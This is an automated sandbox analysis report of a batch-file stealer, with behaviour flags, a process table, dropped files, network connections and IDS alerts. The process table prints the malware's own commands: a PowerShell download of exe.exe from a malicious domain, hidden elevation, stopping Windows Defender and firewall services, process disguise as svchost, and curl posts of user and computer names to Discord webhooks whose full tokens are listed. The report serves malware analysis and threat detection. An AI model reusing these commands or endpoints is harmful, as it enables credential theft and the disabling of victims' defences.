| File name: | d0dd54a04d8c0ec90877013ed6314793ce52537f72143c35bdc2646c26dd3fae.bat |
| Full analysis: | https://app.any.run/tasks/ce6cc1ff-5ef5-4b9a-92a3-9e04b9dadc3d |
| Verdict: | Malicious activity |
| Threats: | Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. |
| Analysis date: | October 11, 2024, 22:28:03 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/x-msdos-batch |
| File info: | DOS batch file, ASCII text, with very long lines (659), with CRLF line terminators |
| MD5: | E9586E0E3590D13CC5A4C413B18EFD12 |
| SHA1: | 697E5683EA6CC8A640D88959E893BF19E264ABA4 |
| SHA256: | D0DD54A04D8C0EC90877013ED6314793CE52537F72143C35BDC2646C26DD3FAE |
| SSDEEP: | 3072:wHzoRbKdUOGbarWuUsYFrEj9Jx945oT+Qwbxycc4uxNwq:E4lOJrW7DRE7goKQkhc4uvJ |
MALICIOUS
Run PowerShell with an invisible window
- powershell.exe (PID: 1396)
- powershell.exe (PID: 4816)
Stealers network behavior
- powershell.exe (PID: 4380)
Attempting to use instant messaging service
- powershell.exe (PID: 4380)
SUSPICIOUS
Uses WMIC.EXE to obtain computer system information
- cmd.exe (PID: 5892)
- cmd.exe (PID: 7124)
Using 'findstr.exe' to search for text patterns in files and output
- cmd.exe (PID: 5892)
- cmd.exe (PID: 7124)
Starts NET.EXE to display or manage information about active sessions
- net.exe (PID: 6044)
- cmd.exe (PID: 5892)
- cmd.exe (PID: 7124)
- net.exe (PID: 2380)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 5892)
- cmd.exe (PID: 7124)
Powershell scripting: start process
- cmd.exe (PID: 5892)
- cmd.exe (PID: 7124)
Executing commands from a ".bat" file
- powershell.exe (PID: 1396)
Starts CMD.EXE for commands execution
- powershell.exe (PID: 1396)
Get information on the list of running processes
- cmd.exe (PID: 7124)
Imports DLL using pinvoke
- powershell.exe (PID: 2708)
CSC.EXE is used to compile C# code
- csc.exe (PID: 5196)
Kill processes via PowerShell
- powershell.exe (PID: 7092)
- powershell.exe (PID: 5356)
- powershell.exe (PID: 7028)
Executable content was dropped or overwritten
- csc.exe (PID: 5196)
The process checks if current user has admin rights
- cmd.exe (PID: 7124)
Possible usage of Discord/Telegram API has been detected (YARA)
- cmd.exe (PID: 7124)
Possibly malicious use of IEX has been detected
- cmd.exe (PID: 7124)
Likely accesses (executes) a file from the Public directory
- curl.exe (PID: 6044)
- curl.exe (PID: 6852)
Request a resource from the Internet using PowerShell's cmdlet
- cmd.exe (PID: 7124)
The process connected to a server suspected of theft
- powershell.exe (PID: 4380)
Probably download files using WebClient
- cmd.exe (PID: 7124)
INFO
Reads the computer name
- curl.exe (PID: 4348)
- curl.exe (PID: 5896)
Checks supported languages
- curl.exe (PID: 4348)
- curl.exe (PID: 5896)
Reads security settings of Internet Explorer
- WMIC.exe (PID: 2576)
Attempting to use instant messaging service
- curl.exe (PID: 4348)
- curl.exe (PID: 5896)
- curl.exe (PID: 6592)
- curl.exe (PID: 3844)
- powershell.exe (PID: 4380)
- curl.exe (PID: 6852)
- curl.exe (PID: 6044)
Manual execution by a user
- dllhost.exe (PID: 4836)
- mobsync.exe (PID: 4512)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
ims-api
(PID) Process(7124) cmd.exe
Discord-Webhook-Tokens (2)1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz
Discord-Info-Links
1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
Get Webhook Infohttps://discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz
Get Webhook Infohttps://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz
Discord-Webhook-Tokens (1)1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
Discord-Info-Links
1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
Get Webhook Infohttps://discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd
Total processes
166
Monitored processes
38
Malicious processes
3
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 692 | powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1396 | powershell -Command "Start-Process -FilePath 'C:\Users\admin\Desktop\d0dd54a04d8c0ec90877013ed6314793ce52537f72143c35bdc2646c26dd3fae.bat' -Verb RunAs" -WindowStyle Hidden | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2380 | net session | C:\Windows\System32\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Net Command Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2576 | wmic computersystem get manufacturer,model | C:\Windows\System32\wbem\WMIC.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2576 | C:\WINDOWS\system32\net1 session | C:\Windows\System32\net1.exe | — | net.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Net Command Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2588 | powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2708 | powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3832 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESDF6C.tmp" "c:\Users\admin\AppData\Local\Temp\r2ua50wn\CSCA7B5AED8E8C4DB888886CFB05675D0.TMP" | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | — | csc.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 14.32.31326.0 Modules
| |||||||||||||||
| 3844 | curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz" | C:\Windows\System32\curl.exe | cmd.exe | ||||||||||||
User: admin Company: curl, https://curl.se/ Integrity Level: HIGH Description: The curl executable Exit code: 35 Version: 8.4.0 Modules
| |||||||||||||||
| 4348 | curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: admin, Computer: DESKTOP-JGLLJLD\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz" | C:\Windows\System32\curl.exe | cmd.exe | ||||||||||||
User: admin Company: curl, https://curl.se/ Integrity Level: MEDIUM Description: The curl executable Exit code: 35 Version: 8.4.0 Modules
| |||||||||||||||
Total events
73 019
Read events
72 841
Write events
167
Delete events
11
Modification events
| (PID) Process: | (1396) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.FriendlyAppName |
Value: Windows Command Processor | |||
| (PID) Process: | (1396) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.ApplicationCompany |
Value: Microsoft Corporation | |||
| (PID) Process: | (6204) StartMenuExperienceHost.exe | Key: | \REGISTRY\A\{b3fbf4cc-cb9f-0bef-8e7b-618f16510021}\LocalState\DataCorruptionRecovery |
| Operation: | write | Name: | InitializationAttemptCount |
Value: 010000006FE974EC2C1CDB01 | |||
| (PID) Process: | (6204) StartMenuExperienceHost.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartNonLayoutProperties |
| Operation: | write | Name: | Completed |
Value: 1 | |||
| (PID) Process: | (6204) StartMenuExperienceHost.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartNonLayoutProperties_AppUsageData |
| Operation: | write | Name: | Completed |
Value: 1 | |||
| (PID) Process: | (6204) StartMenuExperienceHost.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TileDataModel\Migration\StartNonLayoutProperties_TargetedContentTiles |
| Operation: | write | Name: | Completed |
Value: 1 | |||
| (PID) Process: | (6204) StartMenuExperienceHost.exe | Key: | \REGISTRY\A\{b3fbf4cc-cb9f-0bef-8e7b-618f16510021}\LocalState\DataCorruptionRecovery |
| Operation: | write | Name: | InitializationAttemptCount |
Value: 00000000A21DAEEC2C1CDB01 | |||
| (PID) Process: | (6660) SearchApp.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings |
| Operation: | write | Name: | SafeSearchMode |
Value: 1 | |||
| (PID) Process: | (6660) SearchApp.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\Flighting |
| Operation: | write | Name: | CachedFeatureString |
Value: | |||
| (PID) Process: | (6660) SearchApp.exe | Key: | \REGISTRY\A\{6bde8347-fb31-ac37-5e79-7c9029b50849}\LocalState |
| Operation: | write | Name: | BINGIDENTITY_PROP_USEREMAIL |
Value: 00006DE2D1EC2C1CDB01 | |||
Executable files
3
Suspicious files
24
Text files
193
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2708 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gggeuh4s.zbk.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 1396 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bv04ngck.zun.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2708 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5jqj45ig.5rj.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2708 | powershell.exe | C:\Users\admin\AppData\Local\Temp\r2ua50wn\r2ua50wn.0.cs | text | |
MD5:32E8AF8C0F84A8BB4647574F7D67F717 | SHA256:6E0CCA3BBA43EBD5456B392D1B69740A3778B8A9FA86DAD6209C3FBE32335E7A | |||
| 1396 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_facjl0kc.drf.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5356 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bn0bl1tc.fuy.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3832 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESDF6C.tmp | binary | |
MD5:13329E80494A589E33BC80F2F59D9381 | SHA256:4D060D451409B7589841B936930E54688F369B1A732DB7FCE6D861A85D4069EB | |||
| 4816 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_btjgaohs.h5r.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4816 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qmshdwc0.aa3.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2588 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vi21ip4w.324.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
65
TCP/UDP connections
41
DNS requests
11
Threats
13
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5488 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6944 | svchost.exe | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
6908 | RUXIMICS.exe | GET | 200 | 23.48.23.156:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5488 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6944 | svchost.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
6908 | RUXIMICS.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 404 | 104.126.37.137:443 | https://r.bing.com/rb/4N/jnc,nj/WHBHN5CD2X9iLHkLc7Ck-5t1mtg.js?bu=FpIs1Cr8AeQq5yrqKuwqkSuaLOAr5RH6K4Asniz8AfwBgyjDK-MR2hHXK8gr&or=w | unknown | — | — | — |
— | — | GET | 200 | 104.126.37.136:443 | https://www.bing.com/fd/ls/l?IG=12D4DA20593B441E9948ECCCCB117A2E&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.ClientInst%22,%22FID%22:%22CI%22,%22Name%22:%22max%20errors%20reached%22}] | unknown | — | — | — |
— | — | GET | 200 | 104.126.37.137:443 | https://r.bing.com/rb/17/jnc,nj/4bnLx4S3ZRMpYV30k3R5vRy8JVg.js?bu=DygxeIQBiQGMAYEBe37EAccBMbcBMcoB&or=w | unknown | — | — | — |
— | — | GET | 404 | 185.199.108.153:443 | https://diva.ink/exe.exe | unknown | html | 9.16 Kb | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
6944 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
5488 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
6908 | RUXIMICS.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4348 | curl.exe | 162.159.138.232:443 | discord.com | CLOUDFLARENET | — | whitelisted |
5488 | MoUsoCoreWorker.exe | 23.48.23.156:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
6944 | svchost.exe | 23.48.23.156:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
6908 | RUXIMICS.exe | 23.48.23.156:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5488 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
discord.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
ptb.discord.com |
| whitelisted |
r.bing.com |
| whitelisted |
diva.ink |
| malicious |
www.bing.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2172 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com) |
4348 | curl.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
5896 | curl.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
6592 | curl.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
3844 | curl.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
2172 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com) |
6852 | curl.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
6044 | curl.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
— | — | Potentially Bad Traffic | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile |
— | — | A Network Trojan was detected | ET HUNTING Suspicious exe.exe request - possible downloader/Oficla |